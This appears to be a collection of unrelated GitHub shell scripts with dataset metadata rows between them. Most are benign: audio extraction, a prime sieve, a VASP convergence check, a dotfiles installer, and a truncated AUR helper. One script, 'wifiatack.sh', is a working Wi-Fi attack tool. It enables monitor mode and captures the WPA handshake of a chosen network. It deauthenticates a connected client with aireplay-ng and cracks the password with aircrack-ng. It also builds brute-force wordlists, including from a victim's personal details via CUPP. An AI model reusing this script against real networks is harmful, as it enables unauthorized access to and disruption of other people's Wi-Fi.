# Fixed: `[ -e $SRC/* ]` aborts with "too many arguments" (fatal under set -e)
# as soon as $SRC contains more than one entry; `compgen -G` tests whether the
# glob matches anything without expanding it into the test expression.
if compgen -G "$SRC/*" > /dev/null ; then
  echo "Sync $SRC.."
  cp -rf "$SRC"/* "$DEST"
fi
| true
|
8877c76803389dac4e826ee02f5f5190221d6fe4
|
Shell
|
ilaaridh/Kaldi-for-ASR-of-Swiss-German
|
/archimob/extract_audio.sh
|
UTF-8
| 1,732
| 4.4375
| 4
|
[] |
no_license
|
#!/bin/bash

# This script extracts the audio from a set of input videos, and converts it
# to one channel linear pcm, 16 bits, 8KHz.
#
# Input:
#    1.- input_dir: folder to take the input videos from. Only files with the
#        $INPUT_EXTENSION extension are processed (actual supported formats
#        depend on ffmpeg).
#    2.- output_folder: folder to write the wavefiles to. Each wav keeps the
#        name of the original video, with a .wav extension.
#

################
# Configuration:
################
INPUT_EXTENSION='mp4'
SAMPLE_RATE=8000
CODEC=pcm_s16le # Check ffmpeg -codecs for other possibilities

echo "$0" "$@"

if [[ $# -ne 2 ]]; then
    echo "$0 input_files_dir output_folder"
    exit 1
fi

###################
# Input parameters:
###################
input_dir=$1
output_dir=$2

###############
# Intermediate:
###############
log_dir="$output_dir/wav_log"

# Check whether ffmpeg is installed:
if ! type ffmpeg &> /dev/null; then
    echo 'Error: ffmpeg is not installed'
    exit 1
fi

# Check whether the input folder actually exists:
[[ -d "$input_dir" ]] || { echo "Error: missing input folder $input_dir"; exit 1; }

# Create output folders:
mkdir -p "$output_dir" "$log_dir"

# Process the videos. Fixed: iterate the glob directly instead of parsing
# `ls` output, which broke on filenames containing whitespace.
for f in "$input_dir"/*."$INPUT_EXTENSION"; do
    [[ -e "$f" ]] || continue   # unmatched glob stays literal: nothing to do

    echo "Processing $f..."

    input_filename=$(basename "$f")
    base_output="${input_filename%.*}"
    output_file="$output_dir/$base_output.wav"
    log_file="$log_dir/$base_output.log"

    echo "$output_file"

    # -vn: drop video; -ac 1: mono; -y: overwrite any existing output.
    # (Also fixes the original's stray '\ &&' that only worked by accident.)
    if ! ffmpeg -i "$f" -vn -ac 1 -acodec "$CODEC" -ar "$SAMPLE_RATE" -y "$output_file" \
            &> "$log_file"; then
        echo "Error processing $f. See $log_file"
        exit 1
    fi
done

echo "Done: $0"
| true
|
90cc13a0be8bd45be97d1f8b0a58fae84ac5aef5
|
Shell
|
Raidenkyu/FEUP-SSIM
|
/bin/optimize
|
UTF-8
| 160
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/sh
# Run the optimizer in "auto" mode for the given number of steps.
if [ $# -ne "1" ]; then
    echo "Error: Number of steps missing."
    # fixed: the usage line referred to the wrong script name ("bin/train")
    echo "Usage: bin/optimize <integer>"
    # fixed: a usage error must not report success (was `exit 0`)
    exit 1
fi

python3 src/optimizer.py auto "$1"
| true
|
2f39f8a035148c878847855a333899d94e8b8701
|
Shell
|
krailis/hackerrank-solutions
|
/Linux_Shell/Bash/Arithmetic_Operations.sh
|
UTF-8
| 144
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
# Read an arithmetic expression from stdin, evaluate it with bc -l (math
# library enabled, so division keeps decimals) and print the result rounded
# to exactly three decimal places.
read X
result=$(bc -l <<< "$X")
printf "%.3f\n" "$result"
| true
|
7ebaecb14cf5e3471d44aad891af7495b6a46cbc
|
Shell
|
DadaIsCrazy/languages-perfs
|
/src/primes.sh
|
UTF-8
| 431
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
# Count the prime numbers strictly below MAX (= $1) with a sieve of
# Eratosthenes and print the count.

# count_primes MAX -> echo the number of primes p with 0 <= p < MAX.
count_primes() {
    local max=$1
    local -a composite=()
    # 0 and 1 are not primes
    composite[0]=1
    composite[1]=1
    local i j
    # Sieve. Performance fix: the original re-ran `bc <<< "sqrt($MAX)"` on
    # every iteration of this outer loop; `i * i <= max` is the same bound
    # for integers without spawning a process per iteration.
    for (( i = 2; i * i <= max; ++i )); do
        if [ ! "${composite[$i]}" ]; then
            for (( j = i * i; j < max; j += i )); do
                composite[$j]=1
            done
        fi
    done
    # Count the unmarked (prime) slots.
    local total=0
    for (( i = 0; i < max; ++i )); do
        if [ ! "${composite[$i]}" ]; then
            (( ++total ))
        fi
    done
    echo "$total"
}

count_primes "$1"
| true
|
664fc29ad22e2bf8fd9446deb97a3355a188df23
|
Shell
|
cripton666/evilatack
|
/wifiatack.sh
|
UTF-8
| 9,017
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
#creador del script jaime manquel(cripton666)
#Derechos reservados de autor
#Codigo personal se puede copiar pero dejar credito
#herramienta dedicada para poder crear diccionario personalizado y normal
#y realizar el hackeo automatizado
#Esta herramienta cuenta con la herramienta CUPP que nos permite crear diccionarios de fuerza bruta
#dejo sus derechos y los creditos a el o los programadores de esta herramienta
#en el cual su pagina de github es https://github.com/Mebus
trap ctrl_c INT
function ctrl_c(){
limpiar
echo -e "\e[1;33mSaliendo del script...\e[0m"
sleep 1s
limpiar
exit 0
}
function limpiar(){
clear
}
limpiar
sleep 1s
echo
echo
echo -e "\e[1;31m ▄█ █▄ ▄█ ▄████████ ▄█ ▄████████ ███ ▄████████ ▄████████ ▄█ ▄█▄ \e[0m"
echo -e "\e[1;31m███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███ ▄███▀ \e[0m"
echo -e "\e[1;31m███ ███ ███▌ ███ █▀ ███▌ ███ ███ ▀███▀▀██ ███ ███ ███ █▀ ███▐██▀ \e[0m"
echo -e "\e[1;31m███ ███ ███▌ ▄███▄▄▄ ███▌ ███ ███ ███ ▀ ███ ███ ███ ▄█████▀ \e[0m"
echo -e "\e[1;31m███ ███ ███▌ ▀▀███▀▀▀ ███▌ ▀███████████ ███ ▀███████████ ███ ▀▀█████▄ \e[0m"
echo -e "\e[1;31m███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▄ ███▐██▄ \e[0m"
echo -e "\e[1;31m███ ▄█▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███▄ \e[0m"
echo -e "\e[1;31m ▀███▀███▀ █▀ ███ █▀ ███ █▀ ▄████▀ ███ █▀ ████████▀ ███ ▀█▀ \e[0m"
echo -e "\e[1;31m ▀ \e[0m"
echo
echo
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[96mDerechos reservados para el programador\e[0m \e[1;37m(cripton666)\e[0m"
echo
echo -e "\e[1;31m [1]\e[0m \e[1;33mWifi atack\e[0m"
echo -e "\e[1;31m [2]\e[0m \e[1;33mDiccionario(con los Datos de la victima)\e[0m"
echo -e "\e[1;31m [3]\e[0m \e[1;33mDiccionario(Personalizado)\e[0m"
echo -e "\e[1;31m [4]\e[0m \e[1;33mSalir\e[0m"
echo
while :
do
opcion=0
sleep 1s
echo -n -e "\e[1;37m Elige una opcion :\e[0m"
read opcion
case $opcion in
1)
#cripton666 (jaime manquel) creador del script
#herramineta diseñada para el hackeo de redes wifi wpa wpa1 wpa2 via diccionario
trap ctrl_c INT
function ctrl_c(){
echo -e "\e[1;33mSaliendo del script...\e[0m"
rm dnsmasq.conf hostapd.conf 2>/dev/null
rm -r iface 2>/dev/null
find \-name datos-privados.txt | xargs rm 2>/dev/null
sleep 3; ifconfig wlan0mon down 2>/dev/null; sleep 1
iwconfig wlan0mon mode monitor 2>/dev/null; sleep 1
ifconfig wlan0mon up 2>/dev/null; airmon-ng stop wlan0mon > /dev/null 2>&1; sleep 1
tput cnorm; service network-manager restart
exit 0
}
function limpiar_pantalla {
clear
}
limpiar_pantalla
echo
echo
echo
echo -e "\e[0;35m ██╗ ██╗██╗███████╗██╗ █████╗ ████████╗ █████╗ ██████╗██╗ ██╗ \e[0m"
echo -e "\e[0;35m ██║ ██║██║██╔════╝██║ ██╔══██╗╚══██╔══╝██╔══██╗██╔════╝██║ ██╔╝\e[0m"
echo -e "\e[0;35m ██║ █╗ ██║██║█████╗ ██║ ███████║ ██║ ███████║██║ █████╔╝ \e[0m"
echo -e "\e[0;35m ██║███╗██║██║██╔══╝ ██║ ██╔══██║ ██║ ██╔══██║██║ ██╔═██╗ \e[0m"
echo -e "\e[0;35m ╚███╔███╔╝██║██║ ██║ ██║ ██║ ██║ ██║ ██║╚██████╗██║ ██╗ \e[0m"
echo -e "\e[0;35m ╚══╝╚══╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝ \e[0m"
echo
echo
sleep 2s
echo -e "\e[1;37m [:)]\e[0m \e[96mDerechos reservados del programador\e[0m \e[1;37m(cripton666)\e[0m"
sleep 2s
echo
echo -e "\e[1;31m [*]\e[0m \e[1;33mNo todas las targetas de red admiten modo monitor\e[0m"
echo
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[1;33mwlan0\e[0m"
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[1;33mwlan1\e[0m"
sleep 1s
echo -e "\e[1;31m [*]\e[0m \e[1;33mwlan2\e[0m"
xterm -hold -e "iwconfig" &
airodump_xterm_PID=$!
echo
sleep 1s
echo -n -e "\e[1;31m Seleccione su targeta de red :\e[0m"
read TARGETA
limpiar_pantalla
echo
echo -e "\e[1;31m[*]\e[0m \e[1;33mwlan0mon\e[0m"
echo -e "\e[1;31m[*]\e[0m \e[1;33mwlan1mon\e[0m"
echo -e "\e[1;31m[*]\e[0m \e[1;33mwlan2mon\e[0m"
echo
echo -n -e "\e[1;31mSeleccione extencion de targeta wlan0,1,2 EJ:(wlan0mon):\e[0m"
read wlan0
limpiar_pantalla
echo -e "\e[1;31m[*]\e[0m \e[1;33m Estableciendo a modo monitor\e[0m"
sleep 2s
sudo airmon-ng start $TARGETA
limpiar_pantalla
echo -e "\e[1;31m[*]\e[0m \e[1;33m Conectado con exito\e[0m"
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Matando conecciones conflictivas\e[0m"
sleep 3s
killall network-manager hostapd dnsmasq wpa_supplicant dhcpd > /dev/null 2>&1
echo -e "\e[1;31m[*]\e[0m \e[1;33m Dhclient\e[0m"
sleep 3s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Network-manager\e[0m"
sleep 3s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Wpasupplicant\e[0m"
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Creando carpeta de captura\e[0m"
sleep 2s
mkdir Capturas
echo -e "\e[1;31m[*]\e[0m \e[1;33m Creada con exito\e[0m"
cd Capturas
echo -e "\e[1;31m[*]\e[0m \e[1;33m Escaneando redes sercanas disponibles\e[0m"
sleep 4s
xterm -hold -e "sudo airodump-ng $wlan0" &
airodump_xterm_PID=$!
limpiar_pantalla
echo -n -e "\e[1;31mSeleccione la mac bssid de la red que desea atacar :\e[0m"
read red
sleep 2s
echo -n -e "\e[1;31mSeleccione el canal ch de la red :\e[0m"
read CH
echo -n -e "\e[1;31mSeleccione un nombre para la captura :\e[0m"
read CAPTURA
limpiar_pantalla
xterm -hold -e "sudo airodump-ng -c $CH -w $CAPTURA --bssid $red $wlan0" &
airodump_xterm_PID=$!
echo -e "\e[1;31m[*]\e[0m \e[1;33m Vamos a desautenticar a un cliente conectado\e[0m"
sleep 2s
echo -n -e "\e[1;31mSeleccione la mac station de la red :\e[0m"
read USUARIO
limpiar_pantalla
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Desautenticando a usuario\e[0m"
sleep 1s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Interactuando con cliente \e[0m"
sudo aireplay-ng -0 20 -a $red -c $USUARIO $wlan0
limpiar_pantalla
echo -e "\e[1;31m[*]\e[0m \e[1;33m Coneccion exitosa \e[0m"
echo
sleep 1s
echo -e "\e[1;31m[*]\e[0m \e[1;33m No continue hasta tener el handshaker \e[0m"
sleep 2s
echo -n -e "\e[1;31mPara terminar pone el nombre de la captura con su extencion :\e[0m"
read EXTENCION
sleep 2s
echo -e "\e[1;31m[*]\e[0m \e[1;33m Vamos a intentar descriptar la contraseña\e[0m"
sleep 2s
echo -n -e "\e[1;31mSeleccione la ruta del diccionario :\e[0m"
read DICCIONARIO
limpiar_pantalla
sudo aircrack-ng -w $DICCIONARIO -b $red $EXTENCION
read enterkey
;;
2)
limpiar
cd cupp
python3 cupp.py -i
read enterkey
;;
3)
limpiar
echo -e "\e[1;33mRecopilando datos para crear el diccionario\e[0m"
sleep 1s
echo
echo -n -e "\e[1;33mIngrese el minimo de caracteres :\e[0m"
read minimo
sleep 1s
echo
echo -n -e "\e[1;33mIngrese el maximo de caracteres :\e[0m"
read maximo
sleep 1s
echo
echo -n -e "\e[1;33mIngrese los caracteres del diccionario :\e[0m"
read diccionario
sleep 1s
echo
echo -n -e "\e[1;33mNombre del diccionario y al final agregar .txt :\e[0m"
read nombre
sleep 1s
limpiar
echo -e "\e[1;33mCreando diccionario"
crunch $minimo $maximo $diccionario -o $nombre
limpiar
echo -e "\e[1;33mCreado con exito\e[0m"
sleep 3s
./wifiatack.sh
read enterkey
;;
4)
limpiar
echo -e "\e[1;33mSaliendo del script\e[0m"
sleep 1s
limpiar
exit 0
read enterkey
;;
*)
clear
echo "La opcion $opcion no esta en la lista"
read enterkey
;;
esac
done
| true
|
119529d1870ba03af6518c230119c81088584152
|
Shell
|
davidomelettes/flatland
|
/scripts/db_init.sh
|
UTF-8
| 210
| 2.765625
| 3
|
[] |
no_license
|
#!/bin/bash
# Initialise the 'flatland' database from db_init.sql, stopping at the first
# SQL error (-v ON_ERROR_STOP=1) and silencing NOTICE chatter via PGOPTIONS.
# (The "INITIALSING" typo is kept: it is an emitted string.)
echo "--INITIALSING DATABASE..."
if ! PGOPTIONS='--client-min-messages=warning' psql -v ON_ERROR_STOP=1 -q -d flatland -f db_init.sql; then
	exit 1
fi
echo "--DATABASE INITIALISED"
| true
|
88a7ef0d51bc374e75a8ae3a2a3214cc4a206cb6
|
Shell
|
majidmvulle/internations-exercise
|
/build.sh
|
UTF-8
| 358
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Build the project: install back-end and front-end dependencies, build the
# assets for the requested environment (default: prod), then create the
# database and run its migrations.

# $1 selects the front-end build environment; empty/missing means "prod".
env="${1:-prod}"

# Announce a build step with a leading blank line.
step() {
    echo ""
    echo "$1"
}

step "Running composer"
composer install

step "Building Front End"
yarn install
yarn run build --$env

step "Generating database"
bin/console doctrine:database:create

step "Running migrations"
echo "y" | bin/console doctrine:migrations:migrate
| true
|
b32b90e277b3671bbf4e6c413f771889adfda830
|
Shell
|
madumlao/nenv-binstubs
|
/etc/nenv.d/which/nenv-binstubs.bash
|
UTF-8
| 923
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# nenv "which" hook: prefer project-local binstubs over shims.
# Walks from $PWD up to the filesystem root; in the first ancestor that looks
# like a Node project (package.json / package-lock.json) it checks
# node_modules/.bin/ and bin/ for $NENV_COMMAND and, if found executable,
# points NENV_COMMAND_PATH at it.
# Relies on nenv-provided context: NENV_COMMAND, NENV_COMMAND_PATH, NENV_ROOT
# and the remove_from_path helper (all defined outside this file).
check_for_binstubs()
{
local root
local binpath
local modules_binpath
root="$PWD"
binpath='bin'
modules_binpath='node_modules/.bin'
while [ -n "$root" ]; do
if [ -f "$root/package.json" ] || [ -f "$root/package-lock.json" ]; then
potential_path="$root/$modules_binpath/$NENV_COMMAND"
if [ -x "$potential_path" ]; then
NENV_COMMAND_PATH="$potential_path"
return
fi
potential_path="$root/$binpath/$NENV_COMMAND"
if [ -x "$potential_path" ]; then
NENV_COMMAND_PATH="$potential_path"
return
fi
fi
# Strip the last path component; the loop ends when root becomes "".
root="${root%/*}"
done
# if shim / local version doesnt exist, default to system path
# (the shims directory is removed from PATH first so `command -v` cannot
# resolve back to the shim itself)
if ! [ -x "$NENV_COMMAND_PATH" ]; then
PATH="$(remove_from_path "${NENV_ROOT}/shims")"
NENV_COMMAND_PATH="$(command -v "$NENV_COMMAND" || true)"
fi
}
# Escape hatch: set DISABLE_BINSTUBS to skip the lookup entirely.
if [ -z "$DISABLE_BINSTUBS" ]; then
check_for_binstubs
fi
| true
|
d462fa8a9fa42aa9ca58517fe298fe467c999856
|
Shell
|
e-fujiyuki/dotfiles
|
/init.sh
|
UTF-8
| 4,109
| 3.953125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Bootstrap a new machine from the dotfiles repo: clone it, symlink the
# dotfiles into $HOME, configure git/macOS, switch the login shell to
# Homebrew zsh, install prezto/zplug, and optionally create an SSH key pair.
# functions
# exists CMD -> 0 if CMD is on PATH.
exists() {
    command -v "$1" > /dev/null 2>&1
}
# ask PROMPT -> 0 when the user answers y/yes, 1 otherwise.
ask() {
    printf "$* [y/N] "
    local answer
    read answer
    case $answer in
        "yes" ) return 0 ;;
        "y" ) return 0 ;;
        * ) return 1 ;;
    esac
}
# default
## git directory
if [ ! -d ${HOME}/git ]; then
    echo $(tput setaf 2)START: mkdir ~/git $(tput sgr0)
    mkdir -p ${HOME}/git
fi
# clone dotfiles
# NOTE(review): clones from github.com/sak39 -- verify this matches the
# repository this script actually lives in.
if [ ! -d ${HOME}/git/dotfiles ];then
    cd ${HOME}/git
    git clone https://github.com/sak39/dotfiles.git
fi
DOT_DIR=${HOME}/git/dotfiles
# Copy ./dotfiles to ${HOME}
echo $(tput setaf 2)START: put symlinks to ~/ $(tput sgr0)
SYMLINK_DIR=${HOME}/git/dotfiles/symlink
cd ${SYMLINK_DIR}
# Symlink every dotfile (.??* skips "." and ".." but also any 1-char name).
for f in .??*
do
    # Add files or directories you want to ignore like this:
    # [[ ${f} = ".git" ]] && continue
    # [[ ${f} = ".gitignore" ]] && continue
    ln -snfv ${SYMLINK_DIR}/${f} ${HOME}/${f}
done
cd ${DOT_DIR}
echo $(tput setaf 2)"Deploy dotfiles complete!. ✔"$(tput sgr0)
# git config
# NOTE(review): excludesfile is set to ${USER}/.gitignore_global -- this looks
# like it was meant to be ${HOME}/.gitignore_global; confirm before relying on it.
git config --global user.name ${USER}
git config --global user.email ${USER}@gmail.com #todo
git config --global commit.template ${HOME}/.stCommitMsg
git config --global core.excludesfile ${USER}/.gitignore_global
# Configuration for MacOS
case ${OSTYPE} in
    darwin*)
        echo $(tput setaf 2)"START: configuration for macOS"$(tput sgr0)
        CONFIG_MACOS_DIR=${HOME}/git/dotfiles/macos
        bash ${CONFIG_MACOS_DIR}/configuration.sh
        ;;
    *)
        echo $(tput setaf 4)"ERROR: Working only OS X!!"$(tput sgr0)
        exit 1
        ;;
esac
echo $(tput setaf 2)"Configuration complete. ✔"$(tput sgr0)
## zsh must be installed (via Homebrew) before the steps below ##
if ask "set default shell to '/usr/local/bin/zsh' ?"; then
    echo $(tput setaf 2)"START: chsh -s /usr/local/bin/zsh"$(tput sgr0)
    BREW_ZSH_LOCATION=$(which zsh)
    echo $(tput setaf 1)"DEBUG: ${BREW_ZSH_LOCATION}"$(tput sgr0) #@@
    if [ ${BREW_ZSH_LOCATION} != "/usr/local/bin/zsh" ]; then
        echo $(tput setaf 4)"ERROR: brew-zsh does not installed!!"$(tput sgr0)
        exit 1
    fi
    # if [ ! -f "/usr/local/bin/zsh" ]; then
    #   echo $(tput setaf 4)"ERROR: brew-zsh does not installed!!"$(tput sgr0)
    #   exit 1
    # fi
    # A shell must be listed in /etc/shells before chsh will accept it.
    sudo sh -c "echo ${BREW_ZSH_LOCATION} >> /etc/shells"
    # If it writes into /etc/shells successfully
    if [ $? -eq "0" ]; then
        chsh -s ${BREW_ZSH_LOCATION}
        echo $(tput setaf 2)"Change shell complete. ✔"$(tput sgr0)
        echo $(tput setaf 2)"But.. 'chsh: no changes made' appears in there. In this case, you can change your shell at SystemPreference/User&Groups/AdvancedOptions."$(tput sgr0)
    else
        echo $(tput setaf 6)"WARNING: Failed writing into /etc/shells"$(tput sgr0)
    fi
fi
# normal-zsh are installed?
if ! exists zsh ; then
    echo $(tput setaf 4)"ERROR: 'zsh' doesn't installed!!"$(tput sgr0)
    exit 1
fi
# Install prezto
if [[ ! -d ${HOME}/.zprezto ]]; then
    echo $(tput setaf 2)"START: Install 'zprezto'"$(tput sgr0)
    git clone --recursive https://github.com/sorin-ionescu/prezto.git "${ZDOTDIR:-$HOME}/.zprezto"
    echo $(tput setaf 2)"'zprezto' installation complete. ✔"$(tput sgr0)
else
    echo $(tput setaf 6)"WARNING: 'zprezto' is already installed."$(tput sgr0)
fi
# Install zplug
if [[ ! -d ${HOME}/.zplug ]]; then
    echo $(tput setaf 2)"START: Install 'zplug'"$(tput sgr0)
    curl -sL --proto-redir -all,https https://zplug.sh/installer | zsh
    echo $(tput setaf 2)"'zplug' installation complete. ✔"$(tput sgr0)
else
    echo $(tput setaf 6)"WARNING: 'zplug' is already installed."$(tput sgr0)
fi
# SSH key
if ask "Do you want to create ssh key pair?"; then
    # TODO: check how ssh-keygen behaves when the ~/.ssh directory does not exist
    echo $(tput setaf 2)"START: make ssh key pair"$(tput sgr0)
    if exists "ssh-keygen"; then
        ssh-keygen -t rsa -C $(whoami) #comment: USER-NAME
        echo $(tput setaf 2)"make ssh key pair complete. ✔"$(tput sgr0)
    else
        echo $(tput setaf 6)"WARNING: 'ssh-keygen' does not installed."$(tput sgr0)
    fi
fi
| true
|
f2330d0ea9c0400b1442e5add3085c21882311f2
|
Shell
|
Niharika2404/BasicShellScript
|
/folderexist/checkfolder.sh
|
UTF-8
| 115
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash -x
# Ensure that the directory given as $1 exists, creating it (and any missing
# parent directories, via -p) when it does not.
dir=$1
# Quoting is the fix: unquoted, a path containing spaces word-splits, and an
# empty/missing argument collapses the test to `[ -d ]`, which is always true
# and falsely reported "folder exist".
if [ -d "$dir" ];
then
    echo "folder exist";
else
    mkdir -p "$dir";
    echo "folder created";
fi
| true
|
130d7041bc19383c7f4aff6a5f5e97651e305a13
|
Shell
|
jordykoppen/dotfiles
|
/wallpapers/scripts/random
|
UTF-8
| 189
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/sh
# Pick a random wallpaper from the images directory, symlink it as the
# "current" wallpaper and apply it with feh.
# Fixed: the original parsed `ls` output, which breaks on paths containing
# whitespace; printing the glob expansion one entry per line is safe
# (paths containing embedded newlines remain unsupported).
WALLPAPER=$(printf '%s\n' "$DOTFILES"/wallpapers/images/* | shuf -n 1)
ln -sf -v "$WALLPAPER" "$DOTFILES/wallpapers/current" >> /dev/null
feh --bg-fill "$DOTFILES/wallpapers/current" >> /dev/null
| true
|
843ae9fba1271e28019041ac88aa57b90b59d191
|
Shell
|
Mierdin/devstack-odl
|
/tools/upload_image.sh
|
UTF-8
| 1,029
| 4.03125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# upload_image.sh - Retrieve and upload an image into Glance
#
# upload_image.sh <image-url> [...]
#
# Assumes credentials are set via OS_* environment variables

function usage {
    echo "$0 - Retrieve and upload an image into Glance"
    echo ""
    echo "Usage: $0 <image-url> [...]"
    echo ""
    echo "Assumes credentials are set via OS_* environment variables"
    exit 1
}

# Keep track of the current directory
TOOLS_DIR=$(cd $(dirname "$0") && pwd)
TOP_DIR=$(cd $TOOLS_DIR/..; pwd)

# Import common functions (provides upload_image, die_if_not_set, get_field)
source $TOP_DIR/functions

# Import configuration
source $TOP_DIR/openrc "" "" "" ""

# Find the cache dir
FILES=$TOP_DIR/files

if [[ -z "$1" ]]; then
    usage
fi

# Get a token to authenticate to glance
TOKEN=$(keystone token-get | grep ' id ' | get_field 2)
die_if_not_set $LINENO TOKEN "Keystone fail to get token"

# Glance connection info.  Note the port must be specified.
GLANCE_HOSTPORT=${GLANCE_HOSTPORT:-$GLANCE_HOST:9292}

# Fixed: the original iterated over "$*", which joins every argument into one
# word, so with multiple URLs the token landed in the wrong position after
# re-splitting. "$@" keeps each URL as its own iteration.
for IMAGE in "$@"; do
    upload_image "$IMAGE" "$TOKEN"
done
| true
|
0473098e8ef8be9bc1d1cf994f2e00bbc37342a0
|
Shell
|
mzky/Linux-note
|
/资源/linux面授/脚本/while9and9.sh
|
UTF-8
| 204
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
#description Print the lower-triangle 9x9 multiplication table
#version 0.1
#author gaomeng
#date 20160816
# Row r prints the products 1*r .. r*r, tab-separated, one row per line.
for (( row = 1; row <= 9; row++ )); do
    for (( col = 1; col <= row; col++ )); do
        printf '%d*%d=%d\t' "$col" "$row" "$((col * row))"
    done
    printf '\n'
done
| true
|
2e0e9fbedcf9dd6ad268c077cb3b7c6f60588b52
|
Shell
|
pradeepkarnam/Shell_Scripting
|
/checkfile.sh
|
UTF-8
| 102
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
# Read a filename from standard input and report whether that file is
# non-empty (`-s` is true only for an existing file with size > 0).
# -r keeps backslashes in the typed path intact.
read -r file
# Quoting matters here: with an empty reply, the original unquoted
# `[ -s $file ]` degenerated to `[ -s ]`, which is true, so an empty
# input wrongly printed "file is not empty".
if [ -s "$file" ]
then
    echo "file is not empty"
else
    echo "file is empty"
fi
| true
|
426eb5a3b89970d8e60c8ad2bf039385b7616814
|
Shell
|
JabinHao/vasp-py
|
/input/convergence.sh
|
UTF-8
| 878
| 3.765625
| 4
|
[] |
no_license
|
#! /usr/bin/env bash
# Check whether numbered VASP tasks have converged.
# Folders should be named in numerical order (1..N, each with input/OUTCAR).
# Usage: convergence.sh N, where N is the number of your tasks.
# Convergence is detected via the "reached required" line in OUTCAR.

# Require the task-count argument so the loop bound is well defined.
[ -n "$1" ] || { echo "usage: $0 N" >&2; exit 1; }

# Bug fix: the original used `(echo "dir not exist" && exit 1)`; `exit`
# inside a (...) subshell only leaves the subshell, so the script kept
# running. A { ...; } group runs in the current shell and really aborts.
test -d ./1 || { echo "dir not exist"; exit 1; }

echo -e "\n"
echo -e "========================================================================================\n"
for (( i = 1; i < $1+1 ; i++ ))
do
    if [ -d "$i" ]
    then
        if [ -f "$i/input/OUTCAR" ]
        then
            cd "$i/input/"
            # $() instead of backticks; same grep, just modern syntax.
            result=$(grep "reached required" OUTCAR)
            if [ -n "$result" ]
            then
                echo -e "$i\c " && grep "reached required" OUTCAR
            else
                echo "$i task does not reach convergence"
            fi
            cd ../..
        else
            echo "$i task has not completed!"
        fi
    else
        # Message fix: "exit" -> "exist".
        echo "dir $i does not exist"
    fi
done
echo -e "\n========================================================================================\n"
| true
|
ce499ba17af87b530b3aa88d3248b485d211e927
|
Shell
|
Bugswriter/baph
|
/baph
|
UTF-8
| 9,767
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/bash
# simple package installs
typeset -r AUR='https://aur.archlinux.org'
typeset -r BUILDDIR="$HOME/.cache/aur_builds"
typeset -a PACPKGS=()
typeset -a AURPKGS=()
typeset -A DESC=([s]='search' [u]='update' [i]='install')
typeset -A OPTS=([s]='RUN=search' [u]='RUN=update' [i]='RUN=installp' [n]='NOVIEW=--noview' [N]='NOCONF=--noconfirm' [a]='AURONLY=--auronly')
use()
{ # show the standard help message..
  # With -v print only the version banner; otherwise print the full usage
  # text. Always terminates the script with status 0 (used for -h/-v).
	if [[ $1 == '-v' ]]; then
		cat << EOF
baph-VERSION
EOF
	else
		cat << EOF
baph - Simple helper to search, install, and update AUR packages
usage: baph <operation> [options] [package(s)]
operations:
baph {-h --help}
baph {-v --version}
baph {-s --search} <query(s)>
baph {-u --update} [options] [package(s)]
baph {-i --install} [options] <package(s)>
options:
--noview, -n Skip viewing PKGBUILD files
--auronly, -a Only operate on AUR packages
--noconfirm, -N Skip confirmation dialogs
examples:
install 'google-chrome' and 'yay' from the AUR
baph -i google-chrome yay
search for AUR packages matching 'cmus'
baph -s cmus
update all AUR packages on the system, skipping view/confirm dialogs
baph -uanN
EOF
	fi
	exit 0
}
msg()
{ # usage: msg "color" "text" -- print a coloured "::" prefix followed by
  # the text in bold; with an empty colour argument, print the text plainly.
	if [[ $1 ]]; then
		printf "%b::\e[0m \e[1m$2\e[0m\n" "$1"
	else
		printf "%s\n" "$2"
	fi
}
die()
{ # usage: die "text" [exitcode] -- print a red "error:" line, then
  # terminate the shell with exitcode (defaults to 1).
	local text="$1"
	printf "\e[1;31merror:\e[0m\t%s\n" "$text" && exit "${2:-1}"
}
get()
{ # install an AUR package.. usage: get "package"
  # Fetches the package sources into $BUILDDIR (git clone when git is
  # available, otherwise a curl'd snapshot tarball), offers to view the
  # PKGBUILD, then builds via buildp. Returns 1 if the user aborts or the
  # build fails; calls die on fetch errors.
	local pkg="$1"
	# Start from a clean per-package build directory.
	mkdir -p "$BUILDDIR"
	rm -rf "${BUILDDIR:?}/$pkg"
	cd "$BUILDDIR" || die "failed to change directory to build location"
	if hash git >/dev/null 2>&1; then
		msg '\e[34m' "Cloning \e[32m$pkg\e[0m\e[1m package repo..."
		git clone "$AUR/$pkg" || die "failed to clone package repo: $AUR/$pkg"
	else
		# No git: download the cgit snapshot tarball and unpack it.
		msg '\e[34m' "Retrieving package: $pkg"
		[[ -d "$BUILDDIR/$pkg" ]] && rm -rf "${BUILDDIR:?}/$pkg"
		[[ -e "$BUILDDIR/$pkg.tar.gz" ]] && rm -rf "$BUILDDIR/$pkg.tar.gz"
		if curl -LO -m 15 "$AUR/cgit/aur.git/snapshot/$pkg.tar.gz" && [[ -e "$BUILDDIR/$pkg.tar.gz" ]]; then
			tar -xvf "$pkg.tar.gz" || die "failed to extract package archive: $pkg.tar.gz"
			rm -rf "$BUILDDIR/$pkg.tar.gz"
		else
			die "failed to download requested package: $pkg"
		fi
	fi
